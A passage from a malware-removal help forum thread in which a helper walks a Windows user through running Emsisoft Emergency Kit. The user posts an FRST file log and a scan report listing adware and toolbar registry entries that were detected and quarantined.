2014-09-12 19:00 - 2014-08-18 16:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-09-12 19:00 - 2014-08-18 15:46 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-09-12 19:00 - 2014-08-18 15:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-09-12 19:00 - 2014-08-18 15:36 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-09-12 18:59 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-09-12 18:14 - 2014-09-12 18:14 - 00000000 ____D () C:\Users\Dale\AppData\Local\Microsoft_Corporation
2014-09-12 03:57 - 2014-07-06 20:40 - 01059840 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-09-12 03:57 - 2014-07-06 20:40 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-09-12 03:41 - 2014-08-01 06:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-09-12 00:48 - 2014-09-04 20:52 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-12 00:48 - 2014-09-04 20:47 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-09-08 09:30 - 2014-09-13 00:13 - 00196608 ____R () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.TLG
2014-09-08 09:30 - 2014-09-13 00:13 - 00000355 _____ () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.ND
2014-09-04 11:33 - 2014-09-12 18:14 - 00000618 _____ () C:\Users\Dale\Desktop\avgrep.txt
2014-09-02 19:12 - 2014-09-02 21:16 - 00181295 _____ () C:\Windows\system32\avgrep.txt
2014-08-28 00:19 - 2014-08-22 20:46 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-28 00:19 - 2014-08-22 19:42 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\ProgramData\Avg_Update_0814tb
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\Program Files\AVG Security Toolbar
2014-08-24 09:47 - 2014-08-24 09:47 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\AVG2014
2014-08-24 09:43 - 2014-09-08 12:49 - 00000895 _____ () C:\Users\Public\Desktop\AVG 2014.lnk
2014-08-24 09:43 - 2014-08-24 09:43 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TuneUp Software
2014-08-24 09:39 - 2014-08-24 09:45 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-24 09:36 - 2014-08-25 00:06 - 00000000 ____D () C:\Users\Dale\AppData\Local\Avg2014
2014-08-24 09:30 - 2014-08-24 09:31 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-08-23 08:14 - 2014-05-14 11:23 - 01973728 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2014-08-23 08:14 - 2014-05-14 11:23 - 00054240 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2014-08-23 08:14 - 2014-05-14 11:23 - 00045536 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2014-08-23 08:14 - 2014-05-14 11:17 - 02425856 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2014-08-23 08:13 - 2014-05-14 11:23 - 00581600 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2014-08-23 08:13 - 2014-05-14 11:23 - 00036320 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2014-08-23 08:13 - 2014-05-14 11:17 - 00092672 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2014-08-22 15:39 - 2014-08-22 15:39 - 00002091 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-08-22 15:39 - 2014-08-22 15:39 - 00002079 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-08-22 15:38 - 2014-09-12 23:23 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2014-08-22 15:38 - 2014-08-22 15:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-08-22 15:38 - 2013-09-20 10:49 - 00018968 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean.exe
2014-08-22 15:33 - 2014-08-22 15:35 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Dale\Downloads\spybot-2.4.exe
2014-08-19 01:09 - 2014-05-14 09:23 - 00179656 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2014-08-19 01:09 - 2014-05-14 09:17 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2014-08-16 18:18 - 2014-06-30 17:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-08-16 18:18 - 2014-06-06 01:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-08-16 18:18 - 2014-03-09 16:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-08-16 18:18 - 2014-03-09 16:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-15 21:00 - 2014-09-13 11:47 - 00014789 _____ () C:\Users\Dale\Desktop\FRST.txt
2014-09-15 20:57 - 2014-09-13 11:47 - 00000000 ____D () C:\FRST
2014-09-15 20:57 - 2009-07-13 23:34 - 00020704 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-15 20:57 - 2009-07-13 23:34 - 00020704 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-15 20:50 - 2013-06-22 11:23 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-15 20:50 - 2012-03-25 21:02 - 00000000 ____D () C:\Program Files\RegZooka
2014-09-15 20:49 - 2014-07-09 18:33 - 00002196 _____ () C:\Windows\setupact.log
2014-09-15 20:49 - 2014-07-09 18:32 - 00029390 _____ () C:\Windows\PFRO.log
2014-09-15 20:49 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-15 20:48 - 2012-07-06 18:03 - 01100404 _____ () C:\Windows\WindowsUpdate.log
2014-09-15 20:44 - 2014-09-15 20:44 - 04968160 _____ (TeamViewer) C:\Users\Dale\Downloads\TeamViewerQS_en-ckj.exe
2014-09-15 19:49 - 2013-06-22 11:23 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-15 17:53 - 2012-03-25 12:25 - 00000000 ____D () C:\ProgramData\MFAData
2014-09-15 07:29 - 2014-09-14 18:13 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TeamViewer
2014-09-14 20:10 - 2014-09-14 20:11 - 04859480 _____ () C:\Users\Dale\Desktop\RogueKiller.exe
2014-09-14 19:42 - 2014-09-14 19:26 - 00047150 _____ () C:\Users\Dale\Desktop\Addition.txt
2014-09-14 18:12 - 2014-09-14 18:12 - 04691456 _____ (TeamViewer) C:\Users\Dale\Downloads\TeamViewerQS_en.exe
2014-09-13 19:23 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-09-13 18:58 - 2014-09-13 18:58 - 00054720 _____ () C:\ComboFix.txt
2014-09-13 18:58 - 2014-09-13 10:19 - 00000000 ____D () C:\Qoobox
2014-09-13 18:53 - 2009-07-13 21:04 - 00000215 _____ () C:\Windows\system.ini
2014-09-13 12:00 - 2014-09-13 12:00 - 02347384 _____ (ESET) C:\Users\Dale\Downloads\esetsmartinstaller_enu.exe
2014-09-13 11:54 - 2014-09-13 11:54 - 00231760 _____ () C:\Users\Dale\Downloads\CrucialScan.exe
2014-09-13 11:42 - 2009-07-13 21:37 - 00000000 __RHD () C:\Users\Default
2014-09-13 11:42 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-09-13 11:38 - 2014-09-13 10:19 - 00000000 ____D () C:\Windows\erdnt
2014-09-13 11:32 - 2012-03-24 10:28 - 00000000 ____D () C:\Users\Dale
2014-09-13 10:41 - 2014-09-13 10:41 - 00000000 ____D () C:\Users\Dale\Documents\ProcAlyzer Dumps
2014-09-13 10:40 - 2012-03-25 13:40 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-09-13 02:20 - 2014-09-13 10:18 - 01097728 _____ (Farbar) C:\Users\Dale\Desktop\FRST.exe
2014-09-13 02:19 - 2014-09-13 10:18 - 05577449 ____R (Swearware) C:\Users\Dale\Desktop\ComboFix.exe
2014-09-13 01:50 - 2014-09-13 01:38 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-13 01:36 - 2012-03-25 14:34 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-13 01:35 - 2012-03-25 14:36 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\Malwarebytes
2014-09-13 01:34 - 2014-09-13 01:34 - 00001020 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-13 01:33 - 2014-09-13 01:33 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Dale\Downloads\mbam-setup-2.0.2.1012.exe
2014-09-13 01:29 - 2012-05-27 19:36 - 00000000 ____D () C:\Windows\pss
2014-09-13 00:33 - 2014-09-13 00:33 - 00007605 _____ () C:\Users\Dale\AppData\Local\Resmon.ResmonCfg
2014-09-13 00:13 - 2014-09-08 09:30 - 00196608 ____R () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.TLG
2014-09-13 00:13 - 2014-09-08 09:30 - 00000355 _____ () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.ND
2014-09-13 00:13 - 2013-06-03 10:04 - 118804480 ____R () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW
2014-09-12 23:36 - 2012-03-24 10:31 - 00782510 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-12 23:23 - 2014-08-22 15:38 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2014-09-12 21:54 - 2009-07-13 21:04 - 00450770 ____R () C:\Windows\system32\Drivers\etc\hosts.20140913-103855.backup
2014-09-12 20:01 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-09-12 19:04 - 2012-03-24 18:52 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-09-12 18:59 - 2013-07-13 18:02 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-12 18:47 - 2012-03-24 19:36 - 98758480 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-09-12 18:46 - 2014-05-06 18:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-09-12 18:14 - 2014-09-12 18:14 - 00000000 ____D () C:\Users\Dale\AppData\Local\Microsoft_Corporation
2014-09-12 18:14 - 2014-09-04 11:33 - 00000618 _____ () C:\Users\Dale\Desktop\avgrep.txt
2014-09-08 12:49 - 2014-08-24 09:43 - 00000895 _____ () C:\Users\Public\Desktop\AVG 2014.lnk
2014-09-08 12:49 - 2013-11-14 09:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-09-08 12:48 - 2012-05-15 08:43 - 00000000 ____D () C:\$AVG
2014-09-04 20:52 - 2014-09-12 00:48 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-04 20:47 - 2014-09-12 00:48 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-09-03 07:34 - 2012-03-25 21:17 - 00000000 ____D () C:\Windows\options
2014-09-02 21:39 - 2013-07-09 21:46 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-09-02 21:16 - 2014-09-02 19:12 - 00181295 _____ () C:\Windows\system32\avgrep.txt
2014-09-02 21:05 - 2012-03-24 13:06 - 00000000 ____D () C:\Windows.old
2014-08-28 18:21 - 2009-07-13 23:33 - 00426472 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-26 21:52 - 2012-08-15 07:52 - 01316352 ___SH () C:\Users\Dale\Documents\Thumbs.db
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\ProgramData\Avg_Update_0814tb
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\Program Files\AVG Security Toolbar
2014-08-25 17:36 - 2012-03-25 12:31 - 00000000 ____D () C:\Program Files\AVG Secure Search
2014-08-25 00:06 - 2014-08-24 09:36 - 00000000 ____D () C:\Users\Dale\AppData\Local\Avg2014
2014-08-24 09:47 - 2014-08-24 09:47 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\AVG2014
2014-08-24 09:47 - 2012-03-25 12:28 - 00000000 ____D () C:\Program Files\AVG
2014-08-24 09:45 - 2014-08-24 09:39 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-24 09:43 - 2014-08-24 09:43 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TuneUp Software
2014-08-24 09:31 - 2014-08-24 09:30 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-08-22 20:46 - 2014-08-28 00:19 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-22 19:42 - 2014-08-28 00:19 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-22 15:48 - 2009-07-13 21:04 - 00450770 ____R () C:\Windows\system32\Drivers\etc\hosts.20140912-215418.backup
2014-08-22 15:39 - 2014-08-22 15:39 - 00002091 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-08-22 15:39 - 2014-08-22 15:39 - 00002079 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-08-22 15:39 - 2014-08-22 15:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-08-22 15:37 - 2012-03-25 13:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy
2014-08-22 15:37 - 2012-03-25 13:40 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy
2014-08-22 15:35 - 2014-08-22 15:33 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Dale\Downloads\spybot-2.4.exe
2014-08-20 06:51 - 2013-06-22 11:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2014-08-19 12:39 - 2014-09-12 19:00 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-08-18 17:26 - 2014-09-12 19:00 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-08-18 17:08 - 2014-09-12 19:00 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-08-18 16:57 - 2014-09-12 19:00 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-08-18 16:57 - 2014-09-12 19:00 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-08-18 16:46 - 2014-09-12 19:00 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-08-18 16:45 - 2014-09-12 19:00 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-08-18 16:44 - 2014-09-12 19:00 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-08-18 16:44 - 2014-09-12 19:00 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-08-18 16:42 - 2014-09-12 19:00 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-08-18 16:39 - 2014-09-12 19:00 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-08-18 16:39 - 2014-09-12 19:00 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-08-18 16:37 - 2014-09-12 19:00 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-08-18 16:36 - 2014-09-12 19:00 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-08-18 16:36 - 2014-09-12 19:00 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-08-18 16:35 - 2014-09-12 19:00 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-08-18 16:30 - 2014-09-12 19:00 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-08-18 16:27 - 2014-09-12 19:00 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-08-18 16:22 - 2014-09-12 19:00 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-08-18 16:19 - 2014-09-12 19:00 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-08-18 16:17 - 2014-09-12 19:00 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-08-18 16:17 - 2014-09-12 19:00 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-08-18 16:15 - 2014-09-12 19:00 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-08-18 16:09 - 2014-09-12 19:00 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-08-18 16:08 - 2014-09-12 19:00 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-08-18 16:08 - 2014-09-12 19:00 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-08-18 16:07 - 2014-09-12 19:00 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-08-18 15:46 - 2014-09-12 19:00 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-08-18 15:38 - 2014-09-12 19:00 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-08-18 15:36 - 2014-09-12 19:00 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-08-16 18:52 - 2014-02-09 11:10 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
 
Files to move or delete:
====================
C:\Users\Dale\en_res.dll
C:\Users\Dale\es_res.dll
C:\Users\Dale\fr_res.dll
C:\Users\Dale\grm_res.dll
C:\Users\Dale\it_res.dll
C:\Users\Dale\jp_res.dll
C:\Users\Dale\mfc80u.dll
C:\Users\Dale\msvcr80.dll
C:\Users\Dale\PCPE Setup.exe
C:\Users\Dale\pt_res.dll
C:\Users\Dale\ru_res.dll
C:\Users\Dale\zh_res.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-06 17:15
 
==================== End Of Log ============================


#9 aharonov

  • Malware Response Team

Posted 16 September 2014 - 06:39 AM

This fix worked. How is the computer running now?


Download Emsisoft Emergency Kit and save it to your desktop. Double click on EmsisoftEmergencyKit.exe to extract its contents and create a shortcut on the desktop. Leave all settings as they are and click Accept & Extract. A folder named EEK will be created in the root of the drive (usually c:\).
  • After extraction an Emsisoft Emergency Kit window will open. Under "Run Directly:" click Emergency Kit Scanner.
  • When asked to run an online update, click Yes.
  • When the update is finished, click the Back to Security Status link in the left corner. On the main screen click the Scan Now button.
  • Select the Full Scan option and click the SCAN button.
  • When the scan is finished click the Quarantine selected objects button. Note, this option is only available if malicious objects were detected during the scan.
  • Click the View Report button and in the Reports window double-click on the most recent log. Note, logs are named as follows: a2scan_<date>-<time>.txt.
  • Copy/paste the report contents in your next reply.


#10 mpl006

  • Topic Starter

Posted 16 September 2014 - 11:18 AM

The computer is working much better now.  I was worried about it having to restart because the last time it did that the virus came back.  This time it appears as though it is gone.  Here is the log from Emsisoft.  It found 50 issues but all said low risk.

 

Emsisoft Emergency Kit - Version 9.0
Last update: 9/16/2014 7:46:33 AM
User account: Dimension-E510\Dale

Scan settings:

Scan type: Full Scan
Objects: Rootkits, Memory, Traces, C:\, E:\

Detect PUPs: On
Scan archives: On
ADS Scan: On
File extension filter: Off
Advanced caching: On
Direct disk access: Off

Scan start:    9/16/2014 7:47:40 AM
C:\ProgramData\aol toolbar     detected: Application.AppInstall (A)
C:\Users\Dale\AppData\Local\aol toolbar     detected: Application.AppInstall (A)
C:\Program Files\aol toolbar     detected: Application.AppInstall (A)
C:\Program Files\regzooka     detected: Application.AppInstall (A)
C:\Program Files\Common Files\software update utility     detected: Application.InstallUpd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\AXMETASTREAM.METASTREAMCTL     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\AXMETASTREAM.METASTREAMCTL.1     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\AXMETASTREAM.METASTREAMCTLSECONDARY     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\AXMETASTREAM.METASTREAMCTLSECONDARY.1     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{933B95E2-E7B7-4AD9-B952-7AC336682AE3}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{94496571-6AC5-4836-82D5-D46260C44B17}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{B658800C-F66E-4EF3-AB85-6C0C227862A9}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{BC9FD17D-30F6-4464-9E53-596A90AFF023}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{F25AF245-4A81-40DC-92F9-E9021F207706}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATE     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATER.DOWNLOADUIBROWSER     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATER.DOWNLOADUIBROWSER.1     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATER.DOWNLOADUPDCONTROLLER     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATER.DOWNLOADUPDCONTROLLER.1     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INSTALLER\FEATURES\A28B4D68DEBAA244EB686953B7074FEF     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INSTALLER\PRODUCTS\A28B4D68DEBAA244EB686953B7074FEF     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INSTALLER\UPGRADECODES\F928123A039649549966D4C29D35B1C9     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\SCRIPTHELPER.SCRIPTHELPERAPI     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\SCRIPTHELPER.SCRIPTHELPERAPI.1     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{13ABD093-D46F-40DF-A608-47E162EC799D}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{74FB6AFD-DD77-4CEB-83BD-AB2B63E63C93}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{C2AC8A0E-E48E-484B-A71C-C7A937FAAB94}     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\VIPROTOCOL.VIPROTOCOLOLE     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\VIPROTOCOL.VIPROTOCOLOLE.1     detected: Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{95B7759C-8C7F-4BF1-B163-73684A933233}     detected: Application.BHO (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\APN     detected: Application.InstallAd (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\REGZOOKA     detected: Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\AOL TOOLBAR     detected: Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\APN     detected: Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\VIEWPOINTMEDIAPLAYER     detected: Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{86D4B82A-ABED-442A-BE86-96357B70F4FE}     detected: Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\REGZOOKA     detected: Application.InstallAd (A)
C:\ProgramData\Ask     detected: Application.Win32.WebToolbar (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\VIEWPOINT     detected: Application.Win32.ViewBar (A)
Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLEREGISTRYTOOLS     detected: Setting.DisableRegistryTools (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\CONDUIT     detected: Application.InstallAd (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\APPDATALOW\{1146AC44-2F03-4431-B4FD-889BC837521F}     detected: Application.Win32.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\TRACING\TASKSCHEDULER_RASAPI32     detected: Application.Win32.InstallExt (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\TRACING\TASKSCHEDULER_RASMANCS     detected: Application.Win32.InstallExt (A)

Scanned    243145
Found    50

Scan end:    9/16/2014 10:39:36 AM
Scan time:    2:51:56

Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\TRACING\TASKSCHEDULER_RASMANCS    Quarantined Application.Win32.InstallExt (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\TRACING\TASKSCHEDULER_RASAPI32    Quarantined Application.Win32.InstallExt (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\APPDATALOW\{1146AC44-2F03-4431-B4FD-889BC837521F}    Quarantined Application.Win32.InstallAd (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\CONDUIT    Quarantined Application.InstallAd (A)
Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLEREGISTRYTOOLS    Quarantined Setting.DisableRegistryTools (A)
